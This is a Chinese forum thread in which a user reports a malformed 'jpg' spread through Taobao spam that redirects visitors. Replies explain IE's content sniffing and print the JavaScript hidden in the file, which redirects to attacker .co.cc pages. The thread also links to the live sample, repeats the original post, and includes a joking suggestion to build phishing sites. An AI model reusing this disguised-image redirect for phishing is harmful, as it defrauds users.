最新jpg漏洞,该如何解决
日期:2014-05-17 浏览次数:20766 次
最新jpg漏洞
前几天经常收到淘宝的垃圾信息骚扰
旺旺提示是安全连接,我看了一下连接是 jpg的一个图片
就看了一下,结果却跳转了,我把图片下载下来看了一下,应该是个畸形文件
我已经把jpg文件上传到
http://www.taishanfangte.com/aa.jpg
我已经打了所有的补丁了,还是不管用
感兴趣的朋友测试一下
------解决方案--------------------
ie 的安全选项里,一般是选中了“基于内容打开文件,而不是基于文件扩展名”,我想比较可能和这个有关。这个 aa.jpg 文件,并没有 jpeg 格式的文件的标准文件头部,所以 ie 就不再认为它是个图片文件而采用图片方式去打开;在继续查看文件时,又发现了后面有 script ,就执行了它们,所以,就 ……
前几天经常收到淘宝的垃圾信息骚扰
旺旺提示是安全连接,我看了一下连接是 jpg的一个图片
就看了一下,结果却跳转了,我把图片下载下来看了一下,应该是个畸形文件
我已经把jpg文件上传到
http://www.taishanfangte.com/aa.jpg
我已经打了所有的补丁了,还是不管用
感兴趣的朋友测试一下
------解决方案--------------------
ie 的安全选项里,一般是选中了“基于内容打开文件,而不是基于文件扩展名”,我想比较可能和这个有关。这个 aa.jpg 文件,并没有 jpeg 格式的文件的标准文件头部,所以 ie 就不再认为它是个图片文件而采用图片方式去打开;在继续查看文件时,又发现了后面有 script ,就执行了它们,所以,就 ……
- JScript code
<SCRIPT LANGUAGE="JavaScript">
<!--
var c=window.location.toString();
if(c.indexOf("?")!=-1){
var i=c.split("?")[1];
cnum=i.split("_")[0];
cais=i.split("_")[1];
cdom=i.split("_")[2];
if(cdom.indexOf("t.")==-1 || cais.length!=16){
location.href='http://hi.baidu.com/eshopbox/';
}
if(cnum==1){
location.href='http://'+cdom+'.co.cc/1.htm?'+cais;
}
else{
location.href='http://'+cdom+'.co.cc/2.htm?'+cais;
}
}else
{
location.href='http://hi.baidu.com/eshopbox/';
}
//-->
</SCRIPT>
------解决方案--------------------
0 0
还未中过图片毒
------解决方案--------------------
这不算新的.
可以做做掉鱼网站,, 呵呵
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
